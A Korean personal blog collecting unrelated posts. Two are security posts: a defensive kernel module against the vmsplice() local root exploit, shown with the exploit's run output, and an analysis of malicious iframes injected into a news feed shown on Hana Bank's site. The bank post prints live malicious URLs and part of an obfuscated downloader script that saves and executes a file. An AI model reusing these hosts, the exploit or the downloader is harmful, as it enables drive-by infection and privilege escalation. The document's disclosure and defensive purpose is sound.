네이버 백신 탐지에 대한 불쾌과 오탐에 대한 불만



흠... 어찌 이것을 탐지하는가?

미친놈들아닌가?

분류는 엄연히 악성코드명 이라고 되어져있다.

not-a-virs 라 하지만, 영어에 관심이 없거나 유심히 보지않는 사용자들은

바이러스로 알지않을까?

MIRC 써야한다. 단체회의를 위해서 우리는 IRC로 한다.


현재상태 또한 감염됨 무엇이 감염되었다는건가? 정상적인 프로그램이 감염됨?

탐지창 많이 띄우서 잘 발견해 보이려는 건 아닌가?

예전 국내 악성코드 전문업체들(물론 불법적인 행위를 한곳들이 많았음)이

찌꺼기파일들이나 기타 쿠키등.. 을 탐지했다고 욕을 하지않았는가?

네이버 백신으로 알게모르게 지워진 파일들이 꽤 많다.

더군다나..


창을 닫으려고, 그냥 실시간 치료안하고 끄려고 하면,

역시나 치료하기가 나오면, 메세지는 치료하시길 권장합니다 라고

나온다. 미친새끼들 아닌가?

"치료되지 않은 바이러스/스파이웨어가 있습니다" 라고 한다.

저것이 어찌 바이러스? 스파이웨어인가.

"사용중인 PC에 악성코드가 있습니다." -> 미친새끼들 내 PC에 악성코드는 없습니다.

괜히 회의하려고 실시간 엔진켜놓은 네이버 백신 때문에 짜증 많이 나고

오탐 투성이 인 오래된 KAV 엔진사용? 하는 무료 네이버 백신

지금당장  지우고 사용하지 않으렵니다.

알악쓰다가 -> 네이버 백신으로 와봤는데..

다른 무언가를 찾아봐야겠군요.

p.s) 이 내용은 개인적인 생각이며, 이외에 많은것들이 오탐이 되어 굉장히 많은 불편함을
      느낀 사용자의 글로 봐주시면 되겠습니다.





사용자는 불편하거나, 맘에 안들면 과감히 지우게(사용하지않게) 되어져있다.

백신이 어디 한두개인가

일단 쓸만한거 나오기전 까지 알약이나 다시 .... 깔아놔야지





알약도 맘에 썩들진않지만 네이버 백신에 대한 짜증으로 알약을 설치.


물론 오래사용하지 않을 예정임, 유료백신을 사용할예정임.

우연히.. 바이오 안내장을 보다가.. 눈에 들어오는 품목을 발견!!

스펙을 보아하니.. 내가 쓰기에 적당한것 같고...

디자인이며,, 원하는 기능들이 모두 들어가있다.

요즘 사실.. 메이저업체들의 제품들.. 디자인과 기능 편리성 깔끔함을 더해서

기존 조립컴퓨터보다.. 훨씬 좋다.<물론 조립피씨가 가격이저렴한 부분에 대한 메리트를 포함해서말이다>

집에서 윙윙 거리면서 돌고있는 고급 부품잡아먹은 나의 PC가 요즘 따라 계속

미워지는 추세...

그래도.. 어쩔수없이 사용하겠지만,,, 

홍테크 새싹 사무실로 옮겨가야 할듯....



VGX-TP1L

가격은 1,199,999원~



이 제품의 포인트!!
1. 무선랜, 블루투스 기본지원
2. 무선키보드와 리모트컴멘더 제공
3. HDMI 지원 및 HDMI 케이블 제공
4. HDMI to DVI-D 악세사리 지원

다양한 바이오 소프트웨어 및 운영체제 포함!!!!!!

커널모듈을 통한 vmsplice() local root exploit 취약점에 대한 방어 모듈 제작 공개
by hkpco(wowhacker&wowcode)

오늘(2/11) 우연히 vmsplice() root exploit이 공개된것을 보고 커널모듈을 통한 패치를 만들었습니다.

현재까지 kernel 2.6 버전대에서 root exploit이 2개나 공개되었고, 그에대한 패치는

sys_vmsplice() 내부에서 호출되는 몇가지 함수들의 내부에 kernel api인 access_ok()를 사용해서

속성을 체크하는 루틴을 추가시키는 것으로써 예를들면 다음과 같습니다.

--- linux-2.6.orig/fs/splice.c
+++ linux-2.6/fs/splice.c
@@ -1237,6 +1237,9 @@ static int get_iovec_page_array(const st
                if (unlikely(!base))
                        break;

+                if (unlikely(!access_ok(VERIFY_READ, base, len)))
+                        break;
+

또 하나는 vmsplice() system call을 제거하는 방법입니다.

하지만, 두가지 방법 모두 커널을 다시 컴파일 해야하는 단점이 있습니다.

그래서 간단한 방어모듈을 제작해 봤습니다.

현재까지 나온 패치방법은 모두 커널 소스코드를 수정해야 하며,

외국에선 아래 커널 함수들을 수정하는 형태로 공개되었습니다.

vmsplice_to_pipe(), vmsplice_to_user(), get_iovec_page_array(), copy_from_user_mmap_sem()


그런데 위 함수들은 다음과 같은 순서로 호출됩니다.

-------
sys_vmsplice() -> vmsplice_to_pipe() -> get_iovec_page_array() -> copy_from_user_mmap_sem()
or
sys_vmsplice() -> vmsplice_to_user()
-------


그리고 각 kernel api들을 패치할 때 추가되는 루틴은 위 함수들에서 공통적으로 적용되는 인자값이기 때문에

아예 sys_vmsplice()에서 해당 인자값들을 체크하도록 한다면 취약점을 방어할 수 있습니다.

아래는 방어모듈 소스 코드와 이를 컴파일 하기위한 Makefile 입니다.

------------------------------
http://hkpco.kr/code/vmpatch.c
http://hkpco.kr/code/Makefile
------------------------------


다음은 방어모듈을 로드하기 전에 exploit을 테스트 한 결과입니다.

==========================
vmplice local root exploit
==========================

[hkpco@localhost ~]$ id
uid=500(hkpco) gid=500(hkpco) groups=500(hkpco) context=root:system_r:unconfined_t:SystemLow-SystemHigh

[hkpco@localhost ~]$ gcc -o vm_exploit vm_exploit.c
[hkpco@localhost ~]$ ./vm_exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f85000 .. 0xb7fb7000
[+] root

[root@localhost ~]# id
uid=0(root) gid=0(root) groups=500(hkpco) context=root:system_r:unconfined_t:SystemLow-SystemHigh


다음은 방어모듈을 로드하는 과정입니다.

====================
protect module patch
====================

[root@localhost hkpco]# wget http://hkpco.kr/code/vmpatch.c
--05:32:18--  http://hkpco.kr/code/vmpatch.c
Resolving hkpco.kr... 220.80.107.55
Connecting to hkpco.kr|220.80.107.55|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2287 (2.2K) [text/plain]
Saving to: `vmpatch.c'

100%[====================================================================================>] 2,287       --.-K/s   in 0s

05:32:18 (62.0 MB/s) - `vmpatch.c' saved [2287/2287]

[root@localhost hkpco]# wget http://hkpco.kr/code/Makefile
--05:32:33--  http://hkpco.kr/code/Makefile
Resolving hkpco.kr... 220.80.107.55
Connecting to hkpco.kr|220.80.107.55|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 210 [text/plain]
Saving to: `Makefile'

100%[====================================================================================>] 210         --.-K/s   in 0s

05:32:33 (12.2 MB/s) - `Makefile' saved [210/210]

[root@localhost hkpco]# ls
Makefile  vmpatch.c

[root@localhost hkpco]# make
make -C /lib/modules/2.6.18-1.2798.fc6/build SUBDIRS=/root/hkpco modules
make[1]: Entering directory `/usr/src/kernels/2.6.18-1.2798.fc6-i586'
  CC [M]  /root/hkpco/vmpatch.o
/root/hkpco/vmpatch.c: In function 'get_sys_call_table':
/root/hkpco/vmpatch.c:57: warning: assignment makes pointer from integer without a cast
  Building modules, stage 2.
  MODPOST
  CC      /root/hkpco/vmpatch.mod.o
  LD [M]  /root/hkpco/vmpatch.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.18-1.2798.fc6-i586'

[root@localhost hkpco]# ls -l vmpatch.ko
-rw-r--r-- 1 root root 109481 Feb 11 05:42 vmpatch.ko

[root@localhost hkpco]# insmod vmpatch.ko


다음은 방어모듈을 로드한 후에 다시 익스플로잇을 적용시켜본 모습입니다.

==========================
vmplice local root exploit
protect module loaded
==========================

[hkpco@localhost ~]$ id
uid=500(hkpco) gid=500(hkpco) groups=500(hkpco) context=root:system_r:unconfined_t:SystemLow-SystemHigh

[hkpco@localhost ~]$ gcc -o vm_exploit vm_exploit.c
[hkpco@localhost ~]$ ./vm_exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f85000 .. 0xb7fb7000
[-] vmsplice: Bad address

[hkpco@localhost ~]$ id
uid=500(hkpco) gid=500(hkpco) groups=500(hkpco) context=root:system_r:unconfined_t:SystemLow-SystemHigh


익스플로잇이 실패한것을 볼 수 있습니다.

리눅스 커널 배포판이 다양하고 커널 소스코드도 각 배포판마다 부분적으로 수정되기 때문에

시스템 콜 제어를 통한 방어모듈은 모든 리눅스 커널에서 적용되지는 못합니다.

!! 해당 커널모듈 코드는 2월에 출간될 와우스토리에서 Linux Kernel 2.6 Rootkit(제가씀ㅎㅎ) 이라는 주제로

소개되는 내용에서 설명하는 방법을 이용하고 있습니다


http://wowhacker.com/BoArD/view.php?id=wow_free&page=1&sn1=&divpage=2&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=8014

오늘 토요일이다.

새벽 5시경... 웬지 하나은행에 잔액을 확인하고싶어서 들어갔는다
여기저기.. 둘러보던중..

평상시 이것저것 백신을 많이 사용하고 있는데, 오늘은 N사의 백신 경고창이 떠주신다

속으로 에이... 하나은행인데.. iframe이 혹시 박혀있나? 아니겠지..

그래도 치료는 해야지.. 궁금한대?

이런말들을 중얼중얼 거리면서, 마우스 클릭을 시작해주신다

내컴퓨터에 받아진 파일은 main.js

이런 창이 하나가 떳다

내용은 " Trojan-Downloader.HTML.IFrame.ec "

대충 머 홈피에 주로 중국쪽 공격자들이 Iframe 박아서, 자기들이 원하는 프로그램같은
걸 설치해서 먼가를 하려고 하는것

(주로 DDoS 공격모듈도 있고, 광고프로그램 설치되기도하고,, 기타 다양한것들..)

자.. 그렇다면 한번 추적을 해보고싶다.

난 하나은행 고객이다. 내가 쓰는 인터넷 뱅킹이며, 시작할때 유명한 보업업체들의

프로그램들이 쫙쫙 깔린다. <물론 역할마다 분야가 다르겠지만>

일단 보안통신모듈이 설치되고, My Firewall 이라는 작은 방화벽이 하나 깔리고

키보드 보안이라고 안티키로거가 설치가 되고, 머 이것저것 다양하게도 깔린다

컴퓨터가 무거워지도록 말이다. 그런것들을 설치하지 않으면 뱅킹을 할수없는것이

조금 마음에 들진 않지만, 고객을 위한것이니 기꺼이 설치를 해줘야한다.

일단, 어디에 iframe이 깔려있나 확인은 해봐야것다.

애초의 목적은 정상적인데 N사의 백신이 오탐을 하지 않나에서 시작이 된다.

웹소스코드를 보는중.. 느낌가는곳.. 발견


여기를 보면

<iframe src="http:// www.etimes.net/extranews/hanabank/main.asp" width="480" height="75" scrolling="no" frameborder="0"></iframe>

이 부분이 의심..

그리고 접속을 해보았다.


역시 이곳이군..

국내에 있는 이타임즈라는 뉴스 사이트이며, 하나은행에 뉴스를 공급하고 있나보다
저 이타임즈 사이트는 들어가자마자 메인에서 바로 감염될수있으니 접속은 하지않는것
이 역시 좋다

어째거나 하나은행 사이트에서 보여지고 있고, 하나은행 사용자는 저 페이지에 계속

노출이 되고있다.

자 그럼 저 사이트에는 어떤 코드가?


<script src="http://lovekr.super2b.com/main.js"></script>
<iframe width=0 height=0 src='http://218.38.28.68/i/i/ip.htm'></iframe>

main.js와
ip.htm 이 수상하지 않는가?

위주소는 접속하면 아무런 내용이 없고 아래 IP로 된 주소는 페이지가 사라진듯싶다
IP주소로 된곳은 어디인가?
직접 들어가보니 유명 사이버대학교 홈페이지이다


왜 저사이트가 여기에 ip.htm이라는 파일로 iframe으로 박혀있는지는 대충 의심만간다.
혹시 저기도?

자 그럼 위에서 나왔던 lovekr.super2b.com에 있는 파일을 보자..

참고로 저런 파일들은 리눅스에서 wget으로 받아서 보려고 리눅스에 로그인..

[root@localhost test]# wget http://lovekr.super2b.com/main.js
--05:35:28--  http://lovekr.super2b.com/main.js
           => `main.js'
Resolving lovekr.super2b.com... 218.234.23.95
Connecting to lovekr.super2b.com|218.234.23.95|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 283 [application/x-javascript]

100%[====================================>] 283           --.--K/s            

05:35:28 (44.94 MB/s) - `main.js' saved [283/283]

..
..
..
이런식으로 다 받았음


우선 하나은행에서 바로 연결되서 보이는 main.js 파일을 보자

document.write("<iframe width=0 height=0 src=http://lovekr.super2b.com/news.htm></iframe>");
document.write("<iframe width=0 height=0 src=http://lovekr.super2b.com/rss.htm></iframe>");
document.write("<iframe width='0' height='0' src='http://lovekr.super2b.com/dd.htm'></iframe>");

대충 봐도 알겠지만, lovekr 어쩌고하는 수상한 사이트에 news.htm rss.htm dd.htm
파일에 접촉을 하게 된다.

그래서 다 받아버린다

[root@localhost test]# ls
dd.htm  main.js  news.htm  rss.htm
[root@localhost test]#

위에서 부터..

news.htm
---------------------------------------------------------------------
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<SCRIPT>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p
..
..
중략(대충 분위기보면 좀 그렇지않은가? haoqiang 이라는 이름도보이고..)
..
..
\\C\\b","");3="";h.1D=1;3="";r.1C("\\1A\\N\\q",J,0);3="";r.1B();3="";j=L(1t);3="";a o=d.p("\\u\\6\\l\\7\\9\\5\\7\\E\\1h\\c\\H\\7\\f\\4\\u\\X\\8\\5\\4\\b\\1s\\t\\K\\4\\6\\5","");3="";a D=o.1k(0);3="";j=o.W(D,j);3="";h.1j();3="";h.1i(r.1m);3="";h.1n(j,2);3="";h.1r();3="";a T=d.p("\\u\\R\\4\\f\\f\\c\\n\\9\\9\\f\\7\\6\\C\\5\\7\\g\\E","");3="";U=o.W(D+\'\\Q\\Q\\8\\X\\8\\5\\4\\b\\i\\B\',\'\\6\\b\\k\\c\\4\\S\\4\');3="";T.1q(U,\'\\1p\\1o\\6 \'+j,"","\\g\\9\\4\\E",0);3=""}1E(V){V=1}3="";',62,103,'|||haoqiang|x65|x74|x63|x69|x73|x70|var|x6D|x2E|Gf|x30|x6C|x6F|Ss|x33|ufeiure|x64|x72||x41|Fs|CreateObject|x54|Xx|x36|x62|x53|x2D|x43|x2f|x2e|x35|x39|x32|x61|pmeds|x6E|iojiij|x4D|x46|x31|omed|x6A|nnneffd|Math|x45|x6f|x44|x5C|x68|x78|Eo|fdfdeeee|iiiii|BuildPath|x79|createElement|setAttribute|x3A|x42|document|x77|x6c|x6d|x76|x75|x6b|x6e|function|x7E|round|x3a|return|random|try|x67|Write|Open|GetSpecialFolder|x38|responseBody|SaveToFile|x2F|x20|SheLLExecute|Close|x4F|9999|x4C|x58|x66|x34|x48|x50|x47|send|open|type|catch'.split('|'),0,{}))
</SCRIPT>

다른 파일들역시..

rss.htm 도
<sCrIpT lAnGuAgE="jAvAsCrIpT">
eval(function(p,a,c,k,e,d){e=function(c) 요딴식으로 시작하고
나이가 나이인만큼 귀찮은건 잘 안하게 되므로 일일이 풀어보긴 싫다

dd.htm도 마찬가지 좀 분위기가 중국놈들이 장난하는듯한 분위기이며

<script language="javascript" src="http://count1.51yes.com/click.aspx?id=11559482&logo=12"></script>

요딴대로 이동하는 코드도 있고.. 대충 분위기 보면 알지않는가
물론 상세하게 분석해보면 아닐수도, 저런류의 코드는 정황상 좋을 수가 없다.

대략 지금까지 보면
시니리오 대충 그려보면

중국해커? -- 은행 사용자 공격을 위해 검토?--> 하나은행사이트 <-- 사용자 접속 -> 감염
                                  이타임즈사 뉴스 링크 확인  <---|
이타임즈사 공격 후 iframe 박아버림   <--------|

만약, 그 iframe을 통하여 설치된 프로그램이, 인터넷 뱅킹 취약점을 이용하여
해당 사용자가 돈을 이체할때 겉으로는 본인이 원하는 곳이지만 실제로는 공격자가
원하는 계좌로 돌려놓는 프로그램을 심었다면, 돈이 공격자가 원하는 곳으로만
가지 않나 하는 생각도 들었다.

최종적으로 하나은행에 다른곳에 어딘가에 더 있을지 여부는 모르겠지만
"소호마스터즈 클럽" 이라는 곳에 적어도 지금은 보지 않는것이 좋겠다.
특히 안전장치가 없는 사람이라면 더더욱이.. 조심해야겠다.


그냥 혹시 다른 궁금한 사람들이 있지 않을까 하는 마음에 포스팅으로 기록해보았다.

p.s) 하나은행 자체에 대한 취약한 부분이 아니고 다양한 연결고리 속에 한곳이 취약하므로
      그곳과 연결된 다양한 곳들에 대해 피해를 입힐수 있다라는 그러한 부분을 알리고싶어
      포스팅을 해본다. 다르게 생각하면 난 해당 은행사 고객이며, 탐지를 하지 않았더라면
      옆에 있는 백신이 없는 컴퓨터를 이용했더라면 당했을것이다.
      이런것이 백신의 중요성이 아니겠는가? 실시간탐지의 매력이기도 하다


      저 페이지를 고칠때까지 저 페이지를 접속하지 않는것을 권장합니다.
     고쳤다면, 댓글하나 남겨주시는 센스 발휘해주세요...

DDD



gdb 기반.. gtk

다시 리눅스로 왔음..

귀찮은것들 없고,, 내 입맛에 따라서 맘대로 할수있어서 더더욱좋음..

앞으로 하지만, 윈도우를 사용하지않을순 없음..

리눅스용 네이트온..

리눅스에서 MSN의 사용

이런것이 되니.. 기본적으로.. 웬만한 것은 되니까.. 사용하기 더좋다.

게임은 어짜피 안하니..


이정도면 충분하지않나? 내가쓰기위한 전부..

터미널..
MSN
네이트온.

인터넷 서핑도 문제없고..


실시간 케나다 라디오를 들으면서..

워드 작업과 PPT 작업도.. 하고..


무엇보다도,, 플래너가 가장 맘에 든다.



국민은행 리눅스 인터넷뱅킹이나 되었으면좋겠다는 바램....

우연히 알게된...
코드..

66865625 + 카메라 Key 3회 push..

참고) 구형 버전의 경우는 760607 임.

숫자로만 구성된 암호화된 값이 나온다.

ex)
4280694581

이 데이터를 복호화 해야 실제 사용하는 암호화가 나온다.



최근 업그레이드 후..

기계에서 한번더 암호를 물어본다. 이것은 무엇인가 알아봐야겠어.